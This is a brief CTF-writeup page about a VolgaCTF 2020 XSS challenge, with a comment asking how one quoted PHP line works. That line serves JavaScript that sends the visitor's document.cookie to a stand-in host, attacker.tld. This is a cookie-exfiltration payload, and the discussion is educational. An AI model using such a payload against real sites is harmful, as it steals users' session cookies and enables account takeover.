Tags: xss 

Rating: 0

Original writeup (https://blog.blackfan.ru/2020/03/volgactf-2020-qualifier-writeup.html).
ScalpelMarch 29, 2020, 8:57 p.m.

Hi,
can you explain this line from the writeup?

if (strpos( $_SERVER [ 'QUERY_STRING' ], 'attack' ) !== FALSE ) { die ( 'location="https://attacker.tld/?c="+document.cookie;' ); }

How is that used?